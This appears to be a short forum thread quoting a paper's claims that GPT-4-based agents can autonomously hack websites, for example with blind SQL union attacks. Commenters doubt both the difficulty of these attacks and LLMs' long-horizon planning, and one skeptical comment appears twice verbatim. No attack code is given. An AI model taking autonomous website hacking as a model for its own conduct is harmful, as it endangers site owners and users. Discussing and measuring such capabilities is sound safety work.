Control evaluations are less likely to work if our AIs become wildly superhuman in problematic domains (such as hacking, persuasion, etc) before transformative AI
As LLMs have improved in their capabilities, so have their dual-use capabilities.
But many researchers think they serve as a glorified Google. We show that LLM agents can autonomously hack websites, showing they can produce concrete harm.
Our LLM agents can perform complex hacks like blind SQL union attacks. These attacks can take up to 45+ actions to perform and require the LLM to take actions based on feedback.
We further show a strong scaling law, with only GPT-4 and GPT-3.5 successfully hacking websites (73% and 7%, respectively). No open-source model successfully hacks websites.
Our LLM agents can perform complex hacks like blind SQL union attacks.
SQL Union attacks are actually pretty simple and only work on poorly designed and typically old websites. Pretty much any website of the modern era sanitizes inputs to make such attacks impossible.
I have some doubts about the complex actions bit too. My impression so far is that LLMs are still pretty bad at doing long horizon tasks, that is they’re not reliable enough to use at all. SQL union attacks are the ones that seem to have 45 steps so I’m guessing those steps are mostly just guessing lots of different query structures, not really planning.
Somewhat relevant new paper:
SQL Union attacks are actually pretty simple and only work on poorly designed and typically old websites. Pretty much any website of the modern era sanitizes inputs to make such attacks impossible.
I have some doubts about the complex actions bit too. My impression so far is that LLMs are still pretty bad at doing long horizon tasks, that is they’re not reliable enough to use at all. SQL union attacks are the ones that seem to have 45 steps so I’m guessing those steps are mostly just guessing lots of different query structures, not really planning.